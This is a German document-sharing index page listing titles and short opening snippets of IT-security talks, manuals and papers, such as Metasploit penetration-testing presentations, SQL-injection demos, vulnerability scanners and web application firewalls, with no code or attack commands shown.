Reale Angriffsszenarien - Überblick IT-Sicherheit heute - Angriffe, Schutzmechanismen, Umsetzung Reale Angriffsszenarien - Überblick kai.jendrian@secorvo.de Security Consulting GmbH, Karlsruhe Seite 1 Inhalt Praxisprobleme Aktuelle Angriffsmethoden

Mehr

SWAT PRODUKTBROSCHÜRE

SWAT PRODUKTBROSCHÜRE SWAT PRODUKTBROSCHÜRE SICHERHEIT VON WEB APPLIKATIONEN Die Sicherheit von Web Applikationen stellte in den vergangenen Jahren eine große Herausforderung für Unternehmen dar, da nur wenige gute Lösungen

Mehr

Sicherheit in Netzen. Evaluierung des Schwachstellen-Scanners

Sicherheit in Netzen. Evaluierung des Schwachstellen-Scanners Sicherheit in Netzen Evaluierung des Schwachstellen-Scanners Murat Firat Master of Science in CS, WS 04/05 des Vortrages Ziel-Festlegung von Schwachstellen-Scanner Demonstration im Labor Murat Firat Seite

Mehr

GSM: IDS Optimierung. Inhalt. Einleitung

GSM: IDS Optimierung. Inhalt. Einleitung Copyright 2009-2014 Greenbone Networks GmbH Herkunft und aktuellste Version dieses Dokuments: www.greenbone.net/learningcenter/ids_optimization.de.html GSM: IDS Optimierung Inhalt Vorbereitung des Sourcefire

Mehr

WMAP Metasploit 3.2 Module für Pentester von Webapplikationen. OWASP Frankfurt, 25.11.08. The OWASP Foundation http://www.owasp.

WMAP Metasploit 3.2 Module für Pentester von Webapplikationen. OWASP Frankfurt, 25.11.08. The OWASP Foundation http://www.owasp. Germany 2008 Conference http://www.owasp.org/index.php/germany WMAP Metasploit 3.2 Module für Pentester von Webapplikationen Frankfurt, 25.11.08 Hans-Martin Münch it.sec GmbH & Co KG mmuench@it-sec.de

Mehr

Task: Web-Anwendungen

Task: Web-Anwendungen Task: Web-Anwendungen Inhalt Einfachen Scan von Webanwendungen ausführen Fine-Tuning für Scan von Web-Anwendungen Anpassung Scanner Preferences Anpassung NVT Preferences Einleitung Copyright 2009-2014

Mehr

SCAP im Security Process

SCAP im Security Process SCAP im Security Process Security Transparent Lukas Grunwald 2015-05-06 Version 2014062101 Die Greenbone Networks GmbH Fokus: Vulnerability Management Erkennen von und schützen vor Schwachstellen Fortlaufende

Mehr

Pallas GmbH und Secunia präsentieren. Compliance und Nutzen eines automatisierten Patch Managements

Pallas GmbH und Secunia präsentieren. Compliance und Nutzen eines automatisierten Patch Managements Pallas GmbH und Secunia präsentieren Compliance und Nutzen eines automatisierten Patch Managements Software-Schwachstellen Fehler im Anwendungscode: Sicherheitsrisiken Funktionalität Eine Schwachstelle,

Mehr

Penetration Testing mit MetaSploit

Penetration Testing mit MetaSploit Penetration Testing mit MetaSploit Stefan Schumacher www.sicherheitsforschung-magdeburg.de Chemnitzer Linux-Tage 2012 Über Mich Direktor des Magdeburger Instituts für Sicherheitsforschung Forschungsprogramme

Mehr

Secure Coding & Live Hacking von Webapplikationen. Conect Informunity 8.3.2011

Secure Coding & Live Hacking von Webapplikationen. Conect Informunity 8.3.2011 Secure Coding & Live Hacking von Webapplikationen Conect Informunity 8.3.2011 Dr. Ulrich Bayer Security Research Sicherheitsforschung GmbH Motivation Datendiebstahl über (Web)-Applikationen passiert täglich

Mehr

am Beispiel - SQL Injection

am Beispiel - SQL Injection am Beispiel - SQL Injection Einführung Warum ist Sicherheit ein Software Thema? Sicherheit in heutigen Softwareprodukten & Trends OWASP Top 10 Kategorien Hacking Demo SQL Injection: der Weg zu den Daten

Mehr

Security. Stefan Dahler. 6. Zone Defense. 6.1 Einleitung

Security. Stefan Dahler. 6. Zone Defense. 6.1 Einleitung 6. Zone Defense 6.1 Einleitung Im Folgenden wird die Konfiguration von Zone Defense gezeigt. Sie verwenden einen Rechner für die Administration, den anderen für Ihre Tests. In der Firewall können Sie entweder

Mehr

Hier folgt eine kurze Aufstellung über die verwendete Architekur. Die Angaben sind ohne Gewähr für Vollständigkeit oder vollständige Richtigkeit.

Hier folgt eine kurze Aufstellung über die verwendete Architekur. Die Angaben sind ohne Gewähr für Vollständigkeit oder vollständige Richtigkeit. 1. ODBC 1.1 Problemstellung Die Informationen über die Microsoft SQL Server Datenbanken sind zur Zeit nicht auf der TIMD Website verfügbar. Der Grund ist, dass kein Interface zur Abfrage der benötigten

Mehr

LaMa-Creation Portscanner

LaMa-Creation Portscanner LaMa-Creation Portscanner Seite 1 von 12 Seite 2 von 12 Inhaltsverzeichnis Einleitung...4 Systemanforderung...5 Hardware:...5 Software:...5 Unterstützte Clientbetriebssysteme:... 5 Unterstützte Serverbetriebssysteme:...5

Mehr

TimeSafe Leistungserfassung

TimeSafe Leistungserfassung Keep your time safe. TimeSafe Leistungserfassung Adressimport 1/8 Inhaltsverzeichnis Inhaltsverzeichnis... 2 1 Allgemeines... 3 1.1 Adressen in der TimeSafe Leistungserfassung... 3 1.2 Organisationen und/oder

Mehr

13.1 Vorbereitungsarbeiten und Bedienung des Frameworks

13.1 Vorbereitungsarbeiten und Bedienung des Frameworks 543 Dieses Kapitel stellt eine Zusammenfassung der häufigsten Tätigkeiten und verwendeten Befehle in Kurzform dar. Diese Darstellung ist nicht vollständig und soll Ihnen in erster Linie wichtige Anhaltspunkte

Mehr

HÄRTUNG VON WEB-APPLIKATIONEN MIT OPEN-SOURCE-SOFTWARE. Münchener Open-Source-Treffen, Florian Maier, 23.05.2014

HÄRTUNG VON WEB-APPLIKATIONEN MIT OPEN-SOURCE-SOFTWARE. Münchener Open-Source-Treffen, Florian Maier, 23.05.2014 HÄRTUNG VON WEB-APPLIKATIONEN MIT OPEN-SOURCE-SOFTWARE Münchener Open-Source-Treffen, Florian Maier, 23.05.2014 ÜBER MICH 34 Jahre, verheiratet Open Source Enthusiast seit 1997 Beruflich seit 2001 Sicherheit,

Mehr

Infrusion Defection System Evasion durch Angriffsverschleierung in Exploiting Frameworks

Infrusion Defection System Evasion durch Angriffsverschleierung in Exploiting Frameworks Thomas Stein Infrusion Defection System Evasion durch Angriffsverschleierung in Exploiting Frameworks Diplomica Verlag GmbH Inhaltsverzeichnis Abbildungsverzeichnis 7 Tabellenverzeichnis 9 Listingverzeichnis

Mehr

vii Inhaltsverzeichnis 1 Einleitung 1

vii Inhaltsverzeichnis 1 Einleitung 1 vii 1 Einleitung 1 1.1 Was ist das Metasploit-Framework?............................. 2 1.2 Ziel des Buches............................................. 2 1.3 Wer sollte dieses Buch lesen?...................................

Mehr

Betroffene Produkte: Alle Versionen von Oracle Forms (3.0-10g, C/S und Web), Oracle Clinical, Oracle Developer Suite

Betroffene Produkte: Alle Versionen von Oracle Forms (3.0-10g, C/S und Web), Oracle Clinical, Oracle Developer Suite Zusammenfassung: Alle Oracle Forms Anwendungen sind per Default durch SQL Injection angreifbar. Oracle Applications >=11.5.9 ist davon nicht betroffen, da hier standardmäßig der Wert FORMSxx_RESTRICT_ENTER_QUERY

Mehr

OwnCloud. Florian Preinstorfer. http://nblock.org VALUG 14.02.2014

OwnCloud. Florian Preinstorfer. http://nblock.org VALUG 14.02.2014 OwnCloud Florian Preinstorfer http://nblock.org VALUG 14.02.2014 This work is licensed under the Creative Commons Attribution-ShareAlike 3.0 Austria license (CC-BY-SA). Inhalt Einleitung OwnCloud Editions

Mehr

Effizienz im Vor-Ort-Service

Effizienz im Vor-Ort-Service Installation: Anleitung SatWork Integrierte Auftragsabwicklung & -Disposition Februar 2012 Disposition & Auftragsabwicklung Effizienz im Vor-Ort-Service Disclaimer Vertraulichkeit Der Inhalt dieses Dokuments

Mehr

Penetrationstests mit Metasploit

Penetrationstests mit Metasploit Michael Kohl Linuxwochenende 2011 24 September 2011 Outline 1 Einleitung 2 Penetration Testing 3 Metasploit 4 Demo 5 Ressourcen Über mich Früher: Linux/Unix Admin / Systems Engineer Jetzt: Rails-Entwickler,

Mehr

RWE Cloud Services. RWE Cloud Services Global Access Erste Schritte

RWE Cloud Services. RWE Cloud Services Global Access Erste Schritte Global Access Erste Schritte Copyright RWE IT. Any use or form of reproduction, in whole or part, of any material whether by photocopying or storing in any medium by electronic means or otherwise requires

Mehr

Hacker Methoden. für den Angriff auf IT-Systeme. Dortmund, Oktober 2004

Hacker Methoden. für den Angriff auf IT-Systeme. Dortmund, Oktober 2004 Hacker Methoden für den Angriff auf IT-Systeme Dortmund, Oktober 2004 Prof. Dr. Heinz-Michael Winkels, Fachbereich Wirtschaft FH Dortmund Emil-Figge-Str. 44, D44227-Dortmund, TEL.: (0231)755-4966, FAX:

Mehr

Managed VPSv3 Was ist neu?

Managed VPSv3 Was ist neu? Managed VPSv3 Was ist neu? Copyright 2006 VERIO Europe Seite 1 1 EINFÜHRUNG 3 1.1 Inhalt 3 2 WAS IST NEU? 4 2.1 Speicherplatz 4 2.2 Betriebssystem 4 2.3 Dateisystem 4 2.4 Wichtige Services 5 2.5 Programme

Mehr

Aktuelle Sicherheitsprobleme im Internet: Angriffe auf Web-Applikationen

Aktuelle Sicherheitsprobleme im Internet: Angriffe auf Web-Applikationen FAEL-Seminar Aktuelle Sicherheitsprobleme im Internet: Angriffe auf Web-Applikationen Prof. Dr. Marc Rennhard Institut für angewandte Informationstechnologie InIT ZHAW Zürcher Hochschule für Angewandte

Mehr

ISA Server 2004 - Best Practice Analyzer

ISA Server 2004 - Best Practice Analyzer ISA Server 2004 - Best Practice Analyzer Die Informationen in diesem Artikel beziehen sich auf: Microsoft ISA Server 2004 Seit dem 08.12.2005 steht der Microsoft ISA Server 2004 Best Practice Analyzer

Mehr

Reale Angriffsszenarien Typische Regellücken bei Firewalls,, Testtools

Reale Angriffsszenarien Typische Regellücken bei Firewalls,, Testtools IT-Sicherheit heute - Angriffe, Schutzmechanismen, Umsetzung Reale Angriffsszenarien Typische Regellücken bei Firewalls,, Testtools jochen.schlichting@secorvo.de Seite 1 Inhalt Einführung: Typische Angriffe

Mehr

Lebenszyklus einer Schwachstelle

Lebenszyklus einer Schwachstelle GRUNDLAGEN STATISTIKEN BERICHTE Lebenszyklus einer Schwachstelle Nach Bekanntwerden einer neuen Zero-Day-Schwachstelle hat der Hersteller ein Advisory veröffentlicht, in dem bis zur Fertigstellung eines

Mehr

Willkommen zum Security Day 2012

Willkommen zum Security Day 2012 Willkommen zum Security Day 2012 Willkommen zum ITSeCX 2012 Workshop System Exploitation Workshop Überblick Metasploit Framework kennenlernen Awareness und Wissen über moderne Angriffswerkzeuge schärfen

Mehr

Hubert Schweinesbein Tel. 0911 / 749 53-626 e-mail: Hubert.Schweinesbein@suse.de

Hubert Schweinesbein Tel. 0911 / 749 53-626 e-mail: Hubert.Schweinesbein@suse.de Hubert Schweinesbein Tel. 0911 / 749 53-626 e-mail: Hubert.Schweinesbein@suse.de Die nächsten 60 Minuten Der Linux Markt Was ist Linux - was ist Open Source Was macht SuSE SuSE Linux Server Strategie SuSE

Mehr

Aktuelle Sicherheitsprobleme im Internet: Angriffe auf Web-Applikationen

Aktuelle Sicherheitsprobleme im Internet: Angriffe auf Web-Applikationen Aktuelle Sicherheitsprobleme im Internet: Angriffe auf Web-Applikationen Dr. Marc Rennhard Institut für angewandte Informationstechnologie Zürcher Hochschule Winterthur marc.rennhard@zhwin.ch Angriffspunkt

Mehr

am Beispiel - SQL Injection

am Beispiel - SQL Injection am Beispiel - SQL Injection Einführung } Warum ist Sicherheit ein Software Thema? } Sicherheit in heutigen Softwareprodukten & Trends } OWASP Top 10 Kategorien Hacking Demo } SQL Injection: der Weg zu

Mehr

Scanner, Sniffer und Scanlogger

Scanner, Sniffer und Scanlogger Scanner, Sniffer und Scanlogger Sniffer Sniffer Grundlagen Promiscuous Mode Ethernet Gefahren und Nutzen von Sniffer Praxis mit Buttsniff und Sniffit Sniffer Grundlagen Ein Sniffer ist ein Device, ob Software

Mehr

Linutronix - Wir verbinden Welten. Open Source Software in der Industrie. Firmenvorstellung

Linutronix - Wir verbinden Welten. Open Source Software in der Industrie. Firmenvorstellung Linutronix - Wir verbinden Welten Open Source Software in der Industrie Firmenvorstellung Firma Gegründet 1996 von Thomas Gleixner 2006 Umwandlung in GmbH Maintainer von: X86 Architektur RT-Preempt UIO

Mehr

3A03 Security Löcher schnell und effizient schließen mit HP OpenView Radia

3A03 Security Löcher schnell und effizient schließen mit HP OpenView Radia 3A03 Security Löcher schnell und effizient schließen mit HP OpenView Radia Alexander Meisel HP OpenView 2004 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change

Mehr

MOUNT10 StoragePlatform Console

MOUNT10 StoragePlatform Console MOUNT10 StoragePlatform Console V7.14 Kurzmanual für Microsoft Windows Ihr Leitfaden für die Verwaltung der MOUNT10 Backup-Umgebung unter Verwendung der Storage Platform Console Inhaltsverzeichnis 1 VERWENDUNGSZWECK...3

Mehr

WSUS 3.0 - Was ist neu in der nächsten WSUS-Generation?

WSUS 3.0 - Was ist neu in der nächsten WSUS-Generation? WSUS 3.0 - Was ist neu in der nächsten WSUS-Generation? Michael Kalbe Infrastructure Architect Microsoft Deutschland GmbH Agenda Rückblick auf WSUS 2.0 WSUS 3.0 Ziele Funktionen Demo Erweiterungen Weitere

Mehr

Software up to date: Zur eigenen Sicherheit Lücken schließen

Software up to date: Zur eigenen Sicherheit Lücken schließen Software up to date: Zur eigenen Sicherheit Lücken schließen Armin Leinfelder Produktmanager baramundi software AG Agenda Software up to date! Gefahren Lösungen Unternehmen 2 ! Gefahren und Herausforderungen

Mehr

Money for Nothing... and Bits4free

Money for Nothing... and Bits4free Money for Nothing... and Bits4free 8.8.2011 Gilbert Wondracek, gilbert@iseclab.org Hacker & Co Begriff hat je nach Kontext andere Bedeutung, Ursprung: 50er Jahre, MIT Ausnutzen von Funktionalität die vom

Mehr

OpenWAF Web Application Firewall

OpenWAF Web Application Firewall OpenWAF Web Application Firewall Websecurity und OpenWAF in 60 Minuten Helmut Kreft Fuwa, 15.11.2010 Agenda Webapplikationen? Furcht und Schrecken! OWASP Top 10 - Theorie und Praxis mit dem BadStore Umgang

Mehr

Hackerangriffe und Cyber Security im Jahr 2015

Hackerangriffe und Cyber Security im Jahr 2015 Hackerangriffe und Cyber Security im Jahr 2015 Prof. Dr. Sebastian Schinzel schinzel@fh-muenster.de Twitter: @seecurity (c) Prof. Sebastian Schinzel 1 Angriffe Angriff auf Sony Films Nov. 2014 Alle IT-Systeme

Mehr

Integrales Enterprise Threat Schwachstellen-Management mit SCAP

Integrales Enterprise Threat Schwachstellen-Management mit SCAP Integrales Enterprise Threat Schwachstellen-Management mit SCAP Lukas Grunwald, Greenbone Networks CTO Oktober 2012 IT-SA, Nürnberg Version 20100714 Die Greenbone Networks GmbH Fokus: Schwachstellen Management

Mehr

Linux Cluster in Theorie und Praxis

Linux Cluster in Theorie und Praxis Foliensatz Center for Information Services and High Performance Computing (ZIH) Linux Cluster in Theorie und Praxis Monitoring 30. November 2009 Verfügbarkeit der Folien Vorlesungswebseite: http://tu-dresden.de/die_tu_dresden/zentrale_einrichtungen/

Mehr

KASPERSKY SECURITY FOR VIRTUALIZATION 2015

KASPERSKY SECURITY FOR VIRTUALIZATION 2015 KASPERSKY SECURITY FOR VIRTUALIZATION 2015 Leistung, Kosten, Sicherheit: Bessere Performance und mehr Effizienz beim Schutz von virtualisierten Umgebungen AGENDA - Virtualisierung im Rechenzentrum - Marktübersicht

Mehr

Schwachstellenanalyse 2013

Schwachstellenanalyse 2013 Schwachstellenanalyse 2013 Sicherheitslücken und Schwachstellen in Onlineshops Andre C. Faßbender Schwachstellenforschung Faßbender 09.01.2014 Inhaltsverzeichnis 1. Abstract... 3 2. Konfiguration der getesteten

Mehr

1.1 Was ist das Metasploit-Framework?

1.1 Was ist das Metasploit-Framework? 1 Nach nur einem Tag war es den Angreifern gelungen, aktuelle personenbezogene Daten einzusehen, nach zwei Tagen hatten sie Zugriff auf die aktuellen und noch unveröffentlichten Ergebnisse der Entwicklungsabteilung,

Mehr

Live Hacking auf eine Citrix Umgebung

Live Hacking auf eine Citrix Umgebung Live Hacking auf eine Citrix Umgebung Ron Ott + Andreas Wisler Security-Consultants GO OUT Production GmbH www.gosecurity.ch GO OUT Production GmbH Gegründet 1999 9 Mitarbeiter Dienstleistungen: 1 Einleitung

Mehr

Praktikum IT- Sicherheit

Praktikum IT- Sicherheit Praktikum IT- Sicherheit - Versuchshandbuch - Durchführung Honeypot Ein Honeypot stellt ein System dar, um Angriffe, das Verhalten von Malware und weitere Angriffsaktivitäten aufzuzeichnen zu können. Die

Mehr

Persona-SVS e-sync auf Windows Terminal Server

Persona-SVS e-sync auf Windows Terminal Server Persona-SVS e-sync auf Windows Terminal Server 2014 by Fraas Software Engineering GmbH Alle Rechte vorbehalten. Fraas Software Engineering GmbH Sauerlacher Straße 26 82515 Wolfratshausen Germany http://www.fraas.de

Mehr

Sicherheit und ebusiness

Sicherheit und ebusiness Sicherheit und ebusiness Andreas Ebert Regional Technology Officer European Union Microsoft Corporation andrease@microsoft.com Unser Netzwerk ist sicher. Nicht wahr? Klar. Keine Sorge. Wir haben einige

Mehr

Sicherheit von Open Source Software

Sicherheit von Open Source Software Sicherheit von Open Source Software Wie sicher ist Open Source Software? Lukas Kairies Gliederung 1. Begriffseinführung 1. Freie Software 2. Open Source Software 2. Sicherheitsphilosophien 1. Open Source

Mehr

KURZANLEITUNG FÜR DIE. Installation von Nokia Connectivity Cable Drivers

KURZANLEITUNG FÜR DIE. Installation von Nokia Connectivity Cable Drivers KURZANLEITUNG FÜR DIE Installation von Nokia Connectivity Cable Drivers Inhalt 1. Einführung...1 2. Voraussetzungen...1 3. Installation von Nokia Connectivity Cable Drivers...2 3.1 Vor der Installation...2

Mehr

Compliance mit dem IEM Endpoint Manager durchsetzen

Compliance mit dem IEM Endpoint Manager durchsetzen Compliance mit dem IEM Endpoint Manager durchsetzen PPPvorlage_sxUKMvo-05.00.potx santix AG Mies-van-der-Rohe-Straße 4 80807 München www.santix.de santix AG 2 Sicherheit in der IT Was bedeutet Sicherheit

Mehr

Skript zum Kurs Literaturverwaltung mit EndNote - Aufbaukurs Literatur in EndNote organisieren und finden

Skript zum Kurs Literaturverwaltung mit EndNote - Aufbaukurs Literatur in EndNote organisieren und finden Skript zum Kurs Literaturverwaltung mit EndNote - Aufbaukurs Literatur in EndNote organisieren und finden Dieses Werk ist lizenziert unter einer Creative Commons Namensnennung - Weitergabe unter gleichen

Mehr

Philosophie & Tätigkeiten. Geschäftsfelder. Software Engineering. Business Applikationen. Mobile Applikationen. Web Applikationen.

Philosophie & Tätigkeiten. Geschäftsfelder. Software Engineering. Business Applikationen. Mobile Applikationen. Web Applikationen. Philosophie & Tätigkeiten Wir sind ein Unternehmen, welches sich mit der Umsetzung kundenspezifischer Softwareprodukte und IT-Lösungen beschäftigt. Wir unterstützen unsere Kunde während des gesamten Projektprozesses,

Mehr

Remote Administration von Windows Servern mit Microsoft Terminal Services und OpenSSH

Remote Administration von Windows Servern mit Microsoft Terminal Services und OpenSSH Remote Administration von Windows Servern mit Microsoft Terminal Services und OpenSSH von Dominick Baier (dbaier@ernw.de) und Jens Franke (jfranke@ernw.de) 1 Einleitung Dieses Dokument behandelt die flexible

Mehr

Praktikum IT-Sicherheit

Praktikum IT-Sicherheit Praktikum IT-Sicherheit - Versuchshandbuch - Aufgaben Bevor ein Angreifer in ein System eindringen kann, muss er sich Informationen über dieses System beschaffen. Er muss wissen, welche Ports offen sind,

Mehr

PHPIDS Vortrag. PHP Usergroup Frankfurt am Main 14. Februar 2008. Autor: Tom Klingenberg. Web & Applikation

PHPIDS Vortrag. PHP Usergroup Frankfurt am Main 14. Februar 2008. Autor: Tom Klingenberg. Web & Applikation PHPIDS Vortrag PHP Usergroup Frankfurt am Main 14. Februar 2008 Autor: Tom Klingenberg Web & Applikation PHP (PHP: Braucht hier nicht erklärt werden.) IDS IDS: Intrusion Detection System Einbruchsmeldesystem

Mehr

Stuxnet zum Frühstück Industrielle Netzwerksicherheit 2.0 Stuttgart und München

Stuxnet zum Frühstück Industrielle Netzwerksicherheit 2.0 Stuttgart und München Stuxnet zum Frühstück Industrielle Netzwerksicherheit 2.0 Stuttgart und München Angriffe und Schadsoftware zuverlässig erkennen Christian Scheucher secxtreme GmbH Kiefernstraße 38, D-85649 Brunnthal-Hofolding

Mehr

IPCOP OPENVPN TUTORIAL

IPCOP OPENVPN TUTORIAL IPCOP OPENVPN TUTORIAL von Blue nach Green über VPN mit installiertem BOT Zerina Plugin 0.9.4b und OPENVPN GUI auf IPCOP 1.4.10 http://www.ipcop.org http://www.carinthian-linux.at http://www.openvpn-forum.de

Mehr

BESCHAFFUNG UND LIZENZIERUNG MIT DEM VEREINFACHTEN ORACLE LIZENZMODELL

BESCHAFFUNG UND LIZENZIERUNG MIT DEM VEREINFACHTEN ORACLE LIZENZMODELL BESCHAFFUNG UND LIZENZIERUNG MIT DEM VEREINFACHTEN ORACLE LIZENZMODELL DIESER LEITFADEN IST FÜR FOLGENDE ORACLE SOFTWARE PROGRAMME GÜLTIG Oracle Database 11g Standard Edition One Die passende Datenbank-Lösung

Mehr

Softwaresicherheit. Sicherheitsschwachstellen im größeren Kontext. Ulrich Bayer

Softwaresicherheit. Sicherheitsschwachstellen im größeren Kontext. Ulrich Bayer Softwaresicherheit Sicherheitsschwachstellen im größeren Kontext Ulrich Bayer Conect Informunity, 30.1.2013 2 Begriffe - Softwaresicherheit Agenda 1. Einführung Softwaresicherheit 1. Begrifflichkeiten

Mehr

Nagios Erweiterungen Der Rest. Nagios / Icinga. OpenSource Network-Monitoring im großen Stil. Manuel Landesfeind

Nagios Erweiterungen Der Rest. Nagios / Icinga. OpenSource Network-Monitoring im großen Stil. Manuel Landesfeind Erweiterungen Der Rest / Icinga OpenSource Network-Monitoring im großen Stil Manuel Landesfeind Institut für Mathematik Georg-August-Universität Göttingen This presentation can be used under the terms

Mehr

USB Treiber updaten unter Windows 7/Vista

USB Treiber updaten unter Windows 7/Vista USB Treiber updaten unter Windows 7/Vista Hinweis: Für den Downloader ist momentan keine 64 Bit Version erhältlich. Der Downloader ist nur kompatibel mit 32 Bit Versionen von Windows 7/Vista. Für den Einsatz

Mehr

Sinn und Unsinn von Desktop-Firewalls

Sinn und Unsinn von Desktop-Firewalls CLT 2005 Sinn und Unsinn von Desktop-Firewalls Wilhelm Dolle, Director Information Technology interactive Systems GmbH 5. und 6. März 2005 1 Agenda Was ist eine (Desktop-)Firewall? Netzwerk Grundlagen

Mehr

Zabbix 2.4. What's new? What's new in Zabbix 2.4. 1 of

Zabbix 2.4. What's new? What's new in Zabbix 2.4. 1 of Zabbix 2.4 What's new? 1 of What's new in Zabbix 2.4 About me Name: Pascal Schmiel Email: Schmiel@dv-loesungen.de WEB: www.dv-loesungen.de Senior Consultant Zabbix Certified Professional 2 of What's new

Mehr

Installationsanleitung Tivoli Storage Manager für Linux

Installationsanleitung Tivoli Storage Manager für Linux 11. März 2009, Version 1.0 Installationsanleitung für Linux Verwaltungsdirektion Informatikdienste Installationsanleitung für Linux Inhaltsverzeichnis...1 Installation... 1 Voraussetzungen...1 Ablauf der

Mehr

Generating Fingerprints of Network Servers and their Use in Honeypots. Thomas Apel

Generating Fingerprints of Network Servers and their Use in Honeypots. Thomas Apel Generating Fingerprints of Network Servers and their Use in Honeypots Thomas Apel Der Überblick Fingerprinting von Netzwerkdiensten Banner Verfügbare Optionen Reaktionen auf falsche Syntax Verwendung für

Mehr

Nutzung der VDI Umgebung

Nutzung der VDI Umgebung Nutzung der VDI Umgebung Inhalt 1 Inhalt des Dokuments... 2 2 Verbinden mit der VDI Umgebung... 2 3 Windows 7... 2 3.1 Info für erfahrene Benutzer... 2 3.2 Erklärungen... 2 3.2.1 Browser... 2 3.2.2 Vertrauenswürdige

Mehr

Exercise (Part XI) Anastasia Mochalova, Lehrstuhl für ABWL und Wirtschaftsinformatik, Kath. Universität Eichstätt-Ingolstadt 1

Exercise (Part XI) Anastasia Mochalova, Lehrstuhl für ABWL und Wirtschaftsinformatik, Kath. Universität Eichstätt-Ingolstadt 1 Exercise (Part XI) Notes: The exercise is based on Microsoft Dynamics CRM Online. For all screenshots: Copyright Microsoft Corporation. The sign ## is you personal number to be used in all exercises. All

Mehr

Installation mit Lizenz-Server verbinden

Installation mit Lizenz-Server verbinden Einsteiger Fortgeschrittene Profis markus.meinl@m-quest.ch Version 1.0 Voraussetzungen für diesen Workshop 1. Die M-Quest Suite 2005-M oder höher ist auf diesem Rechner installiert 2. Der M-Lock 2005 Lizenzserver

Mehr

Marketing Update. Enabler / ENABLER aqua / Maestro II

Marketing Update. Enabler / ENABLER aqua / Maestro II Marketing Update Enabler / ENABLER aqua / Maestro II Quartal 01/2013 1 Kommentar des Herausgebers Liebe Kunden und Partner, dieser Marketing Update gibt Ihnen einen kurzen Überblick über die aktuell verfügbaren

Mehr

Metasploit 2 the max

Metasploit 2 the max ANGRIFF MICHAEL MESSNER Metasploit 2 the max Schwierigkeitsgrad: Folgendes Szenario: Sie kommen zu einem Auftraggeber, um einen internen Penetrationstest durchzuführen. Nachdem Sie ihre Pentesting Frameworks

Mehr

SWISSVAULT StorageCenter Console Version 5 Kurzanleitung für SWISSVAULT Combo Partner

SWISSVAULT StorageCenter Console Version 5 Kurzanleitung für SWISSVAULT Combo Partner SWISSVAULT StorageCenter Console Version 5 Kurzanleitung für SWISSVAULT Combo Partner April 2008 Version 1.0 Inhaltsverzeichnis 1 VERWENDUNGSZWECK... 3 2 INSTALLATION... 3 3 STORAGECENTER CONSOLE EINRICHTEN...

Mehr

Die DeskCenter Management Suite veröffentlicht neue Version 8.1

Die DeskCenter Management Suite veröffentlicht neue Version 8.1 Die DeskCenter Management Suite veröffentlicht neue Version 8.1 Neues im Basis Modul Benutzerdefinierte Felder Die DeskCenter Management Suite erlaubt nun das Erstellen von selbst definierten Eingabefeldern.

Mehr

Vom Patch zum Exploit - Fallbeispiel

Vom Patch zum Exploit - Fallbeispiel Vom Patch zum Exploit - Fallbeispiel Februar 2009 Autor: Renato Ettisberger SWITCH 2009 1. Einleitung Kurz nachdem eine Sicherheitslücke öffentlich bekannt wird, tauchen bereits die ersten Exploits dafür

Mehr

SCHWACHSTELLE MENSCH

SCHWACHSTELLE MENSCH KAPITEL 2: SICHERHEIT BEGINNT UND ENDET BEIM BENUTZER SCHWACHSTELLE MENSCH 1 SCHWACHSTELLE MENSCH 2014 hat die NTT Group Millionen von Sieben der zehn häufigsten Sicherheitslücken auf Kundensystemen Sicherheitslücken

Mehr

Version/Datum: 1.5 13-Dezember-2006

Version/Datum: 1.5 13-Dezember-2006 TIC Antispam: Limitierung SMTP Inbound Kunde/Projekt: TIC The Internet Company AG Version/Datum: 1.5 13-Dezember-2006 Autor/Autoren: Aldo Britschgi aldo.britschgi@tic.ch i:\products\antispam antivirus\smtp

Mehr

Aktuelle Sicherheitsprobleme im Internet

Aktuelle Sicherheitsprobleme im Internet Herbst 2014 Aktuelle Sicherheitsprobleme im Internet Wirtschaftsinformatik: 5. Semester Dozenten: Rainer Telesko / Martin Hüsler Fachhochschule Nordwestschweiz FHNW / Rainer Telesko - Martin Hüsler 1 Inhalt

Mehr

Wie steht es um die Sicherheit in Software?

Wie steht es um die Sicherheit in Software? Wie steht es um die Sicherheit in Software? Einführung Sicherheit in heutigen Softwareprodukten Typische Fehler in Software Übersicht OWASP Top 10 Kategorien Praktischer Teil Hacking Demo Einblick in die

Mehr

EEX Kundeninformation 2007-09-05

EEX Kundeninformation 2007-09-05 EEX Eurex Release 10.0: Dokumentation Windows Server 2003 auf Workstations; Windows Server 2003 Service Pack 2: Information bezüglich Support Sehr geehrte Handelsteilnehmer, Im Rahmen von Eurex Release

Mehr

What's Next? Dr. Jan-Oliver Wagner Security Transparent 2015 München, 6. Mai 2015

What's Next? Dr. Jan-Oliver Wagner Security Transparent 2015 München, 6. Mai 2015 What's Next? Dr. Jan-Oliver Wagner Security Transparent 2015 München, 6. Mai 2015 What's Next? GOS Lebenszyklus GOS 3.1 Neuerungen Next: GOS 4.0 Roadmap Beyond 4.0 Seite 2 Greenbone OS: Lebens-Zyklus Seite

Mehr

IBM SPSS Collaboration and Deployment Services (C&DS) version 7

IBM SPSS Collaboration and Deployment Services (C&DS) version 7 Dieses Handbuch richtet sich an Systemadministratoren, die IBM SPSS Modeler Entity Analytics (EA) für die Ausführung mit einem der folgenden Produkte konfigurieren: IBM SPSS Collaboration and Deployment

Mehr

Switching. Übung 2 System Management. 2.1 Szenario

Switching. Übung 2 System Management. 2.1 Szenario Übung 2 System Management 2.1 Szenario In der folgenden Übung werden Sie Ihre Konfiguration sichern, löschen und wieder herstellen. Den Switch werden Sie auf die neueste Firmware updaten und die Funktion

Mehr

RSS-Feeds. Zentraler Informatikdienst der Universität Wien. Gerhard Mayer. Stand: April 2014, TYPO3-Version 4.5

RSS-Feeds. Zentraler Informatikdienst der Universität Wien. Gerhard Mayer. Stand: April 2014, TYPO3-Version 4.5 4-2014 RSS-Feeds RSS-Feed RSS-Feeds Zentraler Informatikdienst der Universität Wien Gerhard Mayer Stand: April 2014, TYPO3-Version 4.5 Dieses Skriptum ist eine Begleitunterlage der Schulungen des Zentralen

Mehr

Titel. System Center Configuration Manager 2012 R2 Anleitung zur Installation

Titel. System Center Configuration Manager 2012 R2 Anleitung zur Installation Autor: Thomas Hanrath Microsoft Certified Trainer Titel System Center Configuration Manager 2012 R2 Anleitung zur Installation Eine beispielhafte Installationsanleitung zur Verwendung im Testlab Quelle:

Mehr

DSLinux Skriptbasierte Inventarisierung für Linux

DSLinux Skriptbasierte Inventarisierung für Linux DSLinux Skriptbasierte Inventarisierung für Linux www.docusnap.com TITEL DSLinux AUTOR Docusnap Consulting DATUM 21.04.2015 Die Weitergabe, sowie Vervielfältigung dieser Unterlage, auch von Teilen, Verwertung

Mehr

There is no security on this earth. Na und? General Douglas MacArthur. Alfred E. Neumann

